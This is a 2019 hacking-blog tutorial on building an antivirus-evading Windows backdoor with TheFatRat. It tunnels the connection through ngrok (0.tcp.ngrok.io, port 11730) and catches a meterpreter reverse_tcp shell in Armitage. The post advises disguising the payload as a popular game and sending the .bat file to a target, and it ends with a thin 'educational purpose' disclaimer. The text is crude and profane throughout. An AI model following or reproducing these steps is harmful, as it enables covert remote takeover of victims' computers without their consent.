Saturday, October 5, 2019

How to use TheFatRat and Ngrok and Armitage

Welcome to hacking a rise

Welcome to Hacking A Rise Im the Laughingman the only legend you need to know Im here to show u how to hack any pc with TheFatRat and Ngrok and Armitage this tutorial is for windows Pc’s as most the world run on windows hahaha fucking Muppet’s We all know Linux all the fucking way whoop whoop any ways lads and my sexy gals this what we will need first a Linux OS up today parrot or Kali ngrok with api and fatrat and armitage <--- installed all ready on kali and parrot so there fuck all we can do there so lets talk a bit about all three tools .

The fatrat

Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack,dll . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most AV software find out more here

Ngrok

Ngrok is a multiplatform tunnelling, reverse proxy software that establishes secure tunnels from a public endpoint such as internet to a locally running network service while capturing all traffic for detailed inspection and replay Source: https://ngrok.com/

Armitage

Armitage is nothing but a GUI tool for performing and managing all the tasks that otherwise could have been performed through msfconsole. Armitage helps visualize the targets, automatically recommends suitable exploits, and exposes the advanced post-exploitation

Installing Thefatrat and updating

Instructions on how to install TheFatRat

git clone https://github.com/Screetsec/TheFatRat.git
cd TheFatRat
chmod +x setup.sh && ./setup.sh
Hacking A Rise installfatrat
Update
cd TheFatRat
./update && chmod +x setup.sh && ./setup.sh

installing Ngrok

download ngrok
amd64 here
32 bit here
unzip /path/to/ngrok.zip
./ngrok authtoken <--- you will need an account so sign up here
Try it out by running it from the command line:
./ngrok help
To start a HTTP tunnel on port 80, run this next:
./ngrok http 80

To start a tcp tunnel
./ngrok tcp 4444

How to preform the attack

Now we get to the fun part putting it all together one so first of all open Thefatrat
cd thefatrat
./fatrat
with it loads and press 6
Hacking A Rise thefatrat

and open a new terminal and type ./ngrok tcp 4444
Hacking A Rise fatngrok

Now lads and gals we need to go back to fat rat pick option one
Hacking A Rise onebat

now we need to add the localhost and port so go back to ngrok and copy the 0.tcp.ngrok.io set it as local host and then the local port to 11730 and the name off the payload you can name this what ever you want and then set the payload to [ 3 ] windows/meterpreter/reverse_tcp

Hacking A Rise nameportsand-localhost

(my advice use a well knowing game )

now we let it build the payload once its done you can close fatrat
Hacking A Rise makingpayload-1

Now we open new terminal and type service postgresql start
Hacking A Rise servicepoststart

now we open armitage u can find on the little side menu on kali or in the menu under exploits when you click it you will be asked to connect to the metasploit database
Hacking A Rise armitageconnect
and it will as u the start the rpd
Hacking A Rise armitageconnect2

and now we with this is done
Hacking A Rise connectingarmitage

right lads as u see iv been busy on a network 😉 hahaha but this the armitage dash we will call it for this tutorial
Hacking A Rise dasharmitage

now that we are on the dash of armitage u see the side the panel theres a list aux,exploit,payload,post this were the exploits are
Hacking A Rise Screenshot-from-2019-10-05-00-23-20

On the bottom there is a small text box type handler in here
Hacking A Rise handlerarmitage

now we click it and set the localhost and port and payload so local host is the ngrok url 0.tcp.ngrok.io
and the port 11730 and the payload to windows/meterpreter/reverse_tcp
Hacking A Rise setuparmitage

now hit launch and now u see on armitage a new box poped up on the bottom
Hacking A Rise armitageconsole

Now we send the bat file to the target and with they run it them boom there device will pop up on the side of the panel
Hacking A Rise sidearmitage

i wont be showing ye the exploits as the person that volunteered asked me not to so there ya have it lads lol fucking pussy lol but use the help the command to get the list commands u need this method works with android and linux and mac payloads and exploits

in the console u can use the same commands as metasploit as armitage is the metasploit gui

final thoughts

wel i hate armitage like more i hate pedos and i hate pedos but for a person starting with metasploit and hacking armitage is the best start as it has all the payloads and exploits in a nice neat list on the side the panel as well as its easy set up a two year old can do it lol

DISCLAMER

This article is only for an Educational purpose. Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The Authors and https://hackingarise.com will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.